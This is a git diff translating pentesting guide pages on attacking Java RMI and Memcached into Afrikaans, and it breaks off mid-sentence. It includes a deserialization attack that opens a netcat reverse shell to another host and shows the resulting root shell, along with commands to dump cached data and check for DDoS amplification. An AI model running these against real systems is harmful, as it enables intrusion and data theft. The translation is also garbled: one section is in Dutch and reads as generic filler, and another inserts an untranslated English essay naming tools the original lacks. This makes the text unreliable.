Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Basic Information +## Basiese Inligting -_Java Remote Method Invocation_, or _Java RMI_, is an object oriented _RPC_ mechanism that allows an object located in one _Java virtual machine_ to call methods on an object located in another _Java virtual machine_. This enables developers to write distributed applications using an object-oriented paradigm. A short introduction to _Java RMI_ from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t\_aw1mDNhzI?t=202). - -**Default port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999 +_Java Remote Method Invocation_, of _Java RMI_, is 'n objekgeoriënteerde _RPC_-meganisme wat 'n objek wat in een _Java virtuele masjien_ geleë is, in staat stel om metodes op 'n objek wat in 'n ander _Java virtuele masjien_ geleë is, te roep. Dit stel ontwikkelaars in staat om verspreide toepassings te skryf met behulp van 'n objekgeoriënteerde paradigma. 'n Kort inleiding tot _Java RMI_ vanuit 'n aanvallende perspektief kan gevind word in [hierdie blackhat-aanbieding](https://youtu.be/t\_aw1mDNhzI?t=202). +**Verstekpoort:** 1090,1098,1099,1199,4443-4446,8999-9010,9999 ``` PORT STATE SERVICE VERSION 1090/tcp open ssl/java-rmi Java RMI @@ -35,22 +34,20 @@ PORT STATE SERVICE VERSION 37471/tcp open java-rmi Java RMI 40259/tcp open ssl/java-rmi Java RMI ``` +Gewoonlik is slegs die verstek _Java RMI_ komponente (die _RMI Registry_ en die _Activation System_) gekoppel aan algemene poorte. Die _remote objects_ wat die werklike _RMI_ toepassing implementeer, is gewoonlik gekoppel aan lukrake poorte soos in die uitset hierbo. -Usually, only the default _Java RMI_ components (the _RMI Registry_ and the _Activation System_) are bound to common ports. The _remote objects_ that implement the actual _RMI_ application are usually bound to random ports as shown in the output above. +_nmap_ het soms probleme om _SSL_ beskermde _RMI_ dienste te identifiseer. As jy 'n onbekende ssl-diens op 'n algemene _RMI_ poort teëkom, moet jy verder ondersoek instel. -_nmap_ has sometimes troubles identifying _SSL_ protected _RMI_ services. If you encounter an unknown ssl service on a common _RMI_ port, you should further investigate. +## RMI Komponente -## RMI Components +Om dit eenvoudig te stel, maak _Java RMI_ dit vir 'n ontwikkelaar moontlik om 'n _Java-object_ beskikbaar te stel op die netwerk. Dit maak 'n _TCP_ poort oop waar kliënte kan koppel en metodes op die ooreenstemmende objek kan aanroep. Alhoewel dit eenvoudig klink, is daar verskeie uitdagings wat _Java RMI_ moet oplos: -To put it in simple terms, _Java RMI_ allows a developer to make a _Java object_ available on the network. This opens up a _TCP_ port where clients can connect and call methods on the corresponding object. Despite this sounds simple, there are several challenges that _Java RMI_ needs to solve: +1. Om 'n metode-oproep via _Java RMI_ te stuur, moet kliënte die IP-adres, die luisterpoort, die geïmplementeerde klas of koppelvlak en die `ObjID` van die geteikende objek ken (die `ObjID` is 'n unieke en lukrake identifiseerder wat geskep word wanneer die objek beskikbaar gemaak word op die netwerk. Dit is nodig omdat _Java RMI_ toelaat dat verskeie objekte op dieselfde _TCP_ poort luister). +2. Verre kliënte kan hulpbronne op die bediener toewys deur metodes op die blootgestelde objek aan te roep. Die _Java virtuele masjien_ moet byhou watter van hierdie hulpbronne nog in gebruik is en watter van hulle deur die vullismandjie ingesamel kan word. -1. To dispatch a method call via _Java RMI_, clients need to know the IP address, the listening port, the implemented class or interface and the `ObjID` of the targeted object (the `ObjID` is a unique and random identifier that is created when the object is made available on the network. It is required because _Java RMI_ allows multiple objects to listen on the same _TCP_ port). -2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The _Java virtual machine_ needs to track which of these resources are still in use and which of them can be garbage collected. - -The first challenge is solved by the _RMI registry_, which is basically a naming service for _Java RMI_. The _RMI registry_ itself is also an _RMI service_, but the implemented interface and the `ObjID` are fixed and known by all _RMI_ clients. This allows _RMI_ clients to consume the _RMI_ registry just by knowing the corresponding _TCP_ port. - -When developers want to make their _Java objects_ available within the network, they usually bind them to an _RMI registry_. The _registry_ stores all information required to connect to the object (IP address, listening port, implemented class or interface and the `ObjID` value) and makes it available under a human readable name (the _bound name_). Clients that want to consume the _RMI service_ ask the _RMI registry_ for the corresponding _bound name_ and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary _DNS_ service. The following listing shows a small example: +Die eerste uitdaging word opgelos deur die _RMI-register_, wat basies 'n naamgewingsdiens vir _Java RMI_ is. Die _RMI-register_ self is ook 'n _RMI-diens_, maar die geïmplementeerde koppelvlak en die `ObjID` is vas en bekend by alle _RMI_ kliënte. Dit maak dit vir _RMI_ kliënte moontlik om die _RMI-register_ te gebruik deur net die ooreenstemmende _TCP_ poort te ken. +Wanneer ontwikkelaars hul _Java-objekte_ beskikbaar wil maak binne die netwerk, bind hulle dit gewoonlik aan 'n _RMI-register_. Die _register_ stoor alle inligting wat nodig is om met die objek te verbind (IP-adres, luisterpoort, geïmplementeerde klas of koppelvlak en die `ObjID`-waarde) en maak dit beskikbaar onder 'n mensleesbare naam (die _gebonden naam_). Kliënte wat die _RMI-diens_ wil gebruik, vra die _RMI-register_ vir die ooreenstemmende _gebonden naam_ en die register gee alle nodige inligting om te verbind. Dus is die situasie basies dieselfde as met 'n gewone _DNS_-diens. Die volgende lys toon 'n klein voorbeeld: ```java import java.rmi.registry.Registry; import java.rmi.registry.LocateRegistry; @@ -58,37 +55,35 @@ import lab.example.rmi.interfaces.RemoteService; public class ExampleClient { - private static final String remoteHost = "172.17.0.2"; - private static final String boundName = "remote-service"; +private static final String remoteHost = "172.17.0.2"; +private static final String boundName = "remote-service"; - public static void main(String[] args) - { - try { - Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry - RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name - String response = ref.remoteMethod(); // Call a remote method - - } catch( Exception e) { - e.printStackTrace(); - } - } +public static void main(String[] args) +{ +try { +Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry +RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name +String response = ref.remoteMethod(); // Call a remote method + +} catch( Exception e) { +e.printStackTrace(); +} +} } ``` +Die tweede van die bogenoemde uitdagings word opgelos deur die _Verspreide Vullisverwyderaar_ (_DGC_). Dit is 'n ander _RMI-diens_ met 'n bekende `ObjID`-waarde en dit is beskikbaar op basies elke _RMI-eindpunt_. Wanneer 'n _RMI-kliënt_ begin om 'n _RMI-diens_ te gebruik, stuur dit 'n inligting na die _DGC_ dat die ooreenstemmende _afgeleë voorwerp_ in gebruik is. Die _DGC_ kan dan die verwysingstelling volg en ongebruikte voorwerpe skoonmaak. -The second of the above mentioned challenges is solved by the _Distributed Garbage Collector_ (_DGC_). This is another _RMI service_ with a well known `ObjID` value and it is available on basically each _RMI endpoint_. When an _RMI client_ starts to use an _RMI service_, it sends an information to the _DGC_ that the corresponding _remote object_ is in use. The _DGC_ can then track the reference count and is able to cleanup unused objects. +Saam met die verouderde _Aktiveringstelsel_ is hierdie die drie verstekkomponente van _Java RMI_: -Together with the deprecated _Activation System_, these are the three default components of _Java RMI_: +1. Die _RMI-registreerder_ (`ObjID = 0`) +2. Die _Aktiveringstelsel_ (`ObjID = 1`) +3. Die _Verspreide Vullisverwyderaar_ (`ObjID = 2`) -1. The _RMI Registry_ (`ObjID = 0`) -2. The _Activation System_ (`ObjID = 1`) -3. The _Distributed Garbage Collector_ (`ObjID = 2`) +Die verstekkomponente van _Java RMI_ is al 'n geruime tyd bekende aanvalsvektore en daar bestaan verskeie kwesbaarhede in verouderde _Java_-weergawes. Vanuit 'n aanvaller se perspektief is hierdie verstekkomponente interessant omdat hulle bekende klasse / koppelvlakke geïmplementeer het en dit maklik is om daarmee te interaksieer. Hierdie situasie is anders vir aangepaste _RMI-dienste_. Om 'n metode op 'n _afgeleë voorwerp_ te roep, moet jy die ooreenstemmende metodesignatuur vooraf ken. Sonder om 'n bestaande metodesignatuur te ken, is daar geen manier om met 'n _RMI-diens_ te kommunikeer nie. -The default components of _Java RMI_ have been known attack vectors for quite some time and multiple vulnerabilities exist in outdated _Java_ versions. From an attacker perspective, these default components are interisting, because they implemented known classes / interfaces and it is easily possible to interact with them. This situation is different for custom _RMI services_. To call a method on a _remote object_, you need to know the corresponding method signature in advance. Without knowing an existing method signature, there is no way to communicate to a _RMI service_. - -## RMI Enumeration - -[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is a _Java RMI_ vulnerability scanner that is capable of identifying common _RMI vulnerabilities_ automatically. Whenever you identify an _RMI_ endpoint, you should give it a try: +## RMI Enumerasie +[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is 'n _Java RMI_-kwesbaarheidsskanderingsinstrument wat outomaties algemene _RMI-kwesbaarhede_ kan identifiseer. Telkens wanneer jy 'n _RMI_-eindpunt identifiseer, moet jy dit probeer: ``` $ rmg enum 172.17.0.2 9010 [+] RMI registry bound names: @@ -148,11 +143,9 @@ $ rmg enum 172.17.0.2 9010 [+] --> Deserialization allowed - Vulnerability Status: Vulnerable [+] --> Client codebase enabled - Configuration Status: Non Default ``` +Die uitset van die enumerasie-aksie word in meer detail verduidelik in die [dokumentasiebladsye](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) van die projek. Afhangende van die resultaat, moet jy probeer om geïdentifiseerde kwesbaarhede te verifieer. -The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) of the project. Depending on the outcome, you should try to verify identified vulnerabilities. - -The `ObjID` values displayed by _remote-method-guesser_ can be used to determine the uptime of the service. This may allows to identify other vulnerabilities: - +Die `ObjID`-waardes wat deur _remote-method-guesser_ vertoon word, kan gebruik word om die bedryfstyd van die diens te bepaal. Dit kan help om ander kwesbaarhede te identifiseer: ``` $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]' [+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236] @@ -163,13 +156,11 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]' [+] Time: 1640761503828 (Dec 29,2021 08:05) [+] Count: -32760 ``` +## Bruteforcing van Afgeleë Metodes -## Bruteforcing Remote Methods - -Even when no vulnerabilities have been identified during enumeration, the available _RMI_ services could still expose dangerous functions. Furthermore, despite _RMI_ communication to _RMI_ default components is protected by deserialization filters, when talking to custom _RMI_ services, such filters are usually not in place. Knowing valid method signatures on _RMI_ services is therefore valuable. - -Unfortunately, _Java RMI_ does not support enumerating methods on _remote objects_. That being said, it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) or [rmiscout](https://github.com/BishopFox/rmiscout): +Selfs wanneer geen kwesbaarhede tydens enumerasie geïdentifiseer is nie, kan die beskikbare _RMI_ dienste steeds gevaarlike funksies blootstel. Verder, alhoewel _RMI_ kommunikasie na _RMI_ standaard komponente beskerm word deur deserialisasie filters, is sulke filters gewoonlik nie teenwoordig wanneer daar met aangepaste _RMI_ dienste gepraat word nie. Dit is dus waardevol om geldige metode handtekeninge op _RMI_ dienste te ken. +Ongelukkig ondersteun _Java RMI_ nie die opname van metodes op _afgeleë voorwerpe_ nie. Dit gesê, is dit moontlik om metode handtekeninge te bruteforce met behulp van gereedskap soos [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) of [rmiscout](https://github.com/BishopFox/rmiscout): ``` $ rmg guess 172.17.0.2 9010 [+] Reading method candidates from internal wordlist rmg.txt @@ -199,16 +190,12 @@ $ rmg guess 172.17.0.2 9010 [+] --> void releaseRecord(int recordID, String tableName, Integer remoteHashCode) [+] --> String login(java.util.HashMap dummy1) ``` - -Identified methods can be called like this: - +Geïdentifiseerde metodes kan soos volg geroep word: ``` -$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar +$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar [+] uid=0(root) gid=0(root) groups=0(root) ``` - -Or you can perform deserialization attacks like this: - +Of jy kan deserialisasie-aanvalle soos hierdie uitvoer: ``` $ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)" [+] Creating ysoserial payload... done. @@ -231,20 +218,18 @@ Ncat: Connection from 172.17.0.2:45479. id uid=0(root) gid=0(root) groups=0(root) ``` +Meer inligting kan gevind word in hierdie artikels: -More information can be found in these articles: - -* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/) -* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md) +* [Aanvalle op Java RMI-dienste na JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/) +* [Metode Raai](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md) * [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) * [rmiscout](https://bishopfox.com/blog/rmiscout) -Apart from guessing, you should also look in search engines or _GitHub_ for the interface or even the implementation of an encountered _RMI_ service. The _bound name_ and the name of the implemented class or interface can be helpful here. +Afgesien van raaiwerk, moet jy ook soekmasjiene of _GitHub_ deursoek vir die koppelvlak of selfs die implementering van 'n gevonde _RMI_ diens. Die "gebonden naam" en die naam van die geïmplementeerde klas of koppelvlak kan hier nuttig wees. -## Known Interfaces - -[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marks classes or interfaces as `known` if they are listed in the tool's internal database of known _RMI services_. In these cases you can use the `known` action to get more information on the corresponding _RMI service_: +## Bekende Koppelvlakke +[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) merk klasse of koppelvlakke as `bekend` as hulle in die interne databasis van bekende _RMI-dienste_ van die instrument gelys word. In hierdie gevalle kan jy die `bekend` aksie gebruik om meer inligting oor die betrokke _RMI-diens_ te verkry: ``` $ rmg enum 172.17.0.2 1090 | head -n 5 [+] RMI registry bound names: @@ -303,51 +288,47 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub [+] References: [+] - https://github.com/qtc-de/beanshooter ``` - ## Shodan * `port:1099 java` -## Tools +## Gereedskap * [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) * [rmiscout](https://github.com/BishopFox/rmiscout) * [BaRMIe](https://github.com/NickstaDB/BaRMIe) -## References +## Verwysings * [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Java RMI #Protocol Abbreviation if there is one. Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one. Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out Entry_1: - Name: Enumeration - Description: Perform basic enumeration of an RMI service - Command: rmg enum {IP} {PORT} +Name: Enumeration +Description: Perform basic enumeration of an RMI service +Command: rmg enum {IP} {PORT} ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/11211-memcache/README.md b/network-services-pentesting/11211-memcache/README.md index 26c6a5f96..a023845e4 100644 --- a/network-services-pentesting/11211-memcache/README.md +++ b/network-services-pentesting/11211-memcache/README.md @@ -2,45 +2,42 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Protocol Information +## Protokol-inligting -From [wikipedia](https://en.wikipedia.org/wiki/Memcached): +Van [wikipedia](https://en.wikipedia.org/wiki/Memcached): -> **Memcached** (pronunciation: mem-cashed, mem-cash-dee) is a general-purpose distributed [memory caching](https://en.wikipedia.org/wiki/Memory\_caching) system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. +> **Memcached** (uitspraak: mem-cashed, mem-cash-dee) is 'n algemene verspreide [geheue-caching](https://en.wikipedia.org/wiki/Memory\_caching)-sisteem. Dit word dikwels gebruik om dinamiese databasis-aangedrewe webwerwe te versnel deur data en voorwerpe in RAM te kasheer om die aantal kere wat 'n eksterne data-bron (soos 'n databasis of API) gelees moet word, te verminder. -Although Memcached supports SASL, most instances are **exposed without authentication**. - -**Default port:** 11211 +Alhoewel Memcached SASL ondersteun, word die meeste instansies **sonder outentifikasie blootgestel**. +**Verstekpoort:** 11211 ``` PORT STATE SERVICE 11211/tcp open unknown ``` +## Opstel -## Enumeration +### Handleiding -### Manual +Om alle inligting wat binne 'n memcache-instantie gestoor is, uit te voer, moet jy die volgende doen: -To exfiltrate all the information saved inside a memcache instance you need to: - -1. Find **slabs** with **active items** -2. Get the **key names** of the slabs detected before -3. Ex-filtrate the **saved data** by **getting the key names** - -Remember that this service is just a **cache**, so **data may be appearing and disappearing**. +1. Vind **slabs** met **aktiewe items** +2. Kry die **sleutelname** van die voorheen opgespoorde slabs +3. Voer die **gestoorde data** uit deur die sleutelname te kry +Onthou dat hierdie diens net 'n **kasgeheue** is, so **data kan verskyn en verdwyn**. ```bash echo "version" | nc -vn -w 1 11211 #Get version echo "stats" | nc -vn -w 1 11211 #Get status @@ -53,147 +50,188 @@ echo "get " | nc -vn -w 1 11211 #Get saved info sudo apt-get install php-memcached php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );' ``` +### Handleiding2 -### Manual2 +Memcached is een gedistribueerd geheugencachesysteem dat wordt gebruikt om de prestaties van dynamische webtoepassingen te verbeteren door veelgebruikte gegevens in het geheugen op te slaan. Het draait op poort 11211 en kan worden benaderd via het TCP-protocol. +#### Memcached-commando's + +Hier zijn enkele veelgebruikte Memcached-commando's: + +- **set**: Hiermee kunt u een waarde instellen voor een specifieke sleutel. +- **get**: Hiermee kunt u de waarde ophalen die is gekoppeld aan een specifieke sleutel. +- **add**: Hiermee kunt u een waarde toevoegen aan een specifieke sleutel, maar alleen als de sleutel nog niet bestaat. +- **replace**: Hiermee kunt u de waarde vervangen die is gekoppeld aan een specifieke sleutel, maar alleen als de sleutel al bestaat. +- **delete**: Hiermee kunt u een specifieke sleutel en de bijbehorende waarde verwijderen. +- **incr**: Hiermee kunt u de waarde van een specifieke sleutel met een bepaald bedrag verhogen. +- **decr**: Hiermee kunt u de waarde van een specifieke sleutel met een bepaald bedrag verlagen. + +#### Memcached-aanvallen + +Memcached kan kwetsbaar zijn voor verschillende aanvallen, zoals: + +- **Memcached DDoS-aanval**: Een aanvaller kan een DDoS-aanval uitvoeren door een groot aantal valse verzoeken naar een Memcached-server te sturen, waardoor de server overbelast raakt en niet meer reageert op legitieme verzoeken. +- **Memcached-gegevenslek**: Als een Memcached-server onjuist is geconfigureerd en toegankelijk is vanaf het internet, kan een aanvaller gevoelige gegevens uit het cachegeheugen extraheren. +- **Memcached-misbruik van onbeveiligde commando's**: Een aanvaller kan onbeveiligde Memcached-commando's misbruiken om gegevens te wijzigen, te verwijderen of te stelen. + +#### Memcached-pentesten + +Bij het uitvoeren van een pentest op een Memcached-server, zijn hier enkele belangrijke stappen om te volgen: + +1. Identificeer de Memcached-server en bepaal of deze toegankelijk is vanaf het internet. +2. Voer een poortscan uit om te controleren of poort 11211 open is. +3. Gebruik de Memcached-commando's om gegevens te manipuleren en kwetsbaarheden te identificeren. +4. Voer een DDoS-test uit om de veerkracht van de server te testen tegen een aanval. +5. Controleer de configuratie van de Memcached-server om ervoor te zorgen dat deze correct is beveiligd. + +#### Memcached-beveiligingstips + +Om de beveiliging van een Memcached-server te verbeteren, kunt u de volgende maatregelen nemen: + +- Beperk de toegang tot de Memcached-server tot vertrouwde IP-adressen. +- Schakel authenticatie in om ervoor te zorgen dat alleen geautoriseerde gebruikers toegang hebben. +- Beveilig de communicatie met de Memcached-server door gebruik te maken van versleuteling. +- Houd de Memcached-software up-to-date met de nieuwste patches en beveiligingsupdates. +- Controleer regelmatig de configuratie van de Memcached-server om ervoor te zorgen dat deze correct is geconfigureerd en beveiligd. + +#### Bronnen + +- [Memcached-documentatie](https://memcached.org/documentation) +- [Memcached Security Best Practices](https://www.memcached.org/security) +- [Memcached DDoS Attacks](https://www.cloudflare.com/learning/ddos/memcached-ddos-attack/) ```bash sudo apt install libmemcached-tools memcstat --servers=127.0.0.1 #Get stats memcdump --servers=127.0.0.1 #Get all items memccat --servers=127.0.0.1 #Get info inside the item(s) ``` +### Outomaties -### Automatic +Memcached is a widely used in-memory caching system that is often deployed in web applications to improve performance. However, misconfigurations in Memcached can lead to security vulnerabilities that can be exploited by attackers. +Memcached is a network service that listens on port 11211 by default. It uses a simple text-based protocol, making it easy to interact with using tools like telnet or netcat. + +One common misconfiguration is leaving Memcached exposed to the internet without any authentication or access controls. This allows anyone to connect to the service and perform various operations, including retrieving and modifying data. + +Attackers can take advantage of this misconfiguration to launch distributed denial-of-service (DDoS) attacks by sending a large number of requests to the Memcached service, overwhelming the target server's resources. + +To automate the process of identifying and exploiting misconfigured Memcached instances, you can use tools like Memcrashed and DDoS-Memcached. These tools leverage the Memcached protocol to send a large number of requests to the target server, causing it to consume excessive resources and potentially crash. + +It is important to note that exploiting misconfigured Memcached instances is illegal and unethical. It is recommended to only perform these actions in a controlled environment with proper authorization. + +To protect against Memcached attacks, it is crucial to properly configure and secure Memcached instances. This includes enabling authentication, restricting access to trusted IP addresses, and monitoring for any suspicious activity. + +By understanding the potential risks and taking appropriate security measures, you can mitigate the vulnerabilities associated with Memcached and ensure the integrity and availability of your web applications. ```bash nmap -n -sV --script memcached-info -p 11211 #Just gather info msf > use auxiliary/gather/memcached_extractor #Extracts saved data -msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplification attack is possible +msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplification attack is possible ``` +## **Dumping Memcache Sleutels** -## **Dumping Memcache Keys** +In die wêreld van memcache, 'n protokol wat help om data te organiseer deur middel van slabs, bestaan daar spesifieke bevele om die gestoorde data te ondersoek, alhoewel met merkbare beperkings: -In the realm of memcache, a protocol that assists in organizing data by slabs, specific commands exist for inspecting the stored data, albeit with notable constraints: +1. Sleutels kan slegs gedump word volgens slab-klas, wat sleutels van soortgelyke inhoudsgrootte groepeer. +2. Daar is 'n limiet van een bladsy per slab-klas, wat gelykstaan aan 1MB data. +3. Hierdie funksie is onoffisieel en kan enige tyd gestaak word, soos bespreek in [gemeenskapsforums](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM). -1. Keys can only be dumped by slab class, grouping keys of similar content size. -2. A limit exists of one page per slab class, equating to 1MB of data. -3. This feature is unofficial and may be discontinued at any time, as discussed in [community forums](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM). +Die beperking om slegs 1MB te kan dump van moontlik gigabytes data is veral betekenisvol. Nietemin kan hierdie funksionaliteit steeds insig bied in sleutelgebruikspatrone, afhangende van spesifieke behoeftes. Vir diegene wat minder belangstel in die meganika, onthul 'n besoek aan die [gereedskap-afdeling](https://lzone.de/cheat-sheet/memcached#tools) hulpmiddels vir omvattende dumping. Alternatiewelik word die proses om telnet te gebruik vir direkte interaksie met memcached-opsette hieronder uiteengesit. -The limitation of only being able to dump 1MB from potentially gigabytes of data is particularly significant. However, this functionality can still offer insights into key usage patterns, depending on specific needs. For those less interested in the mechanics, a visit to the [tools section](https://lzone.de/cheat-sheet/memcached#tools) reveals utilities for comprehensive dumping. Alternatively, the process of using telnet for direct interaction with memcached setups is outlined below. - -### **How it Works** - -Memcache's memory organization is pivotal. Initiating memcache with the "-vv" option reveals the slab classes it generates, as shown below: +### **Hoe dit Werk** +Memcache se geheue-organisasie is van kardinale belang. Deur memcache te inisieer met die "-vv" opsie, word die slab-klasse wat dit genereer, onthul, soos hieronder getoon: ```bash $ memcached -vv slab class 1: chunk size 96 perslab 10922 [...] ``` - -To display all currently existing slabs, the following command is used: - +Om al die tans bestaande slabs te vertoon, word die volgende bevel gebruik: ```bash stats slabs ``` - -Adding a single key to memcached 1.4.13 illustrates how slab classes are populated and managed. For instance: - +Die toevoeging van 'n enkele sleutel tot memcached 1.4.13 illustreer hoe slabsklasse bevolk en bestuur word. Byvoorbeeld: ```bash set mykey 0 60 1 1 STORED ``` - -Executing the "stats slabs" command post key addition yields detailed statistics about slab utilization: - +Die uitvoering van die "stats slabs" bevel na sleutel byvoeging lewer gedetailleerde statistieke oor die gebruik van slabs: ```bash stats slabs [...] ``` +Hierdie uitset toon die aktiewe slabs, gebruikte stukke en operasionele statistieke, wat insig bied in 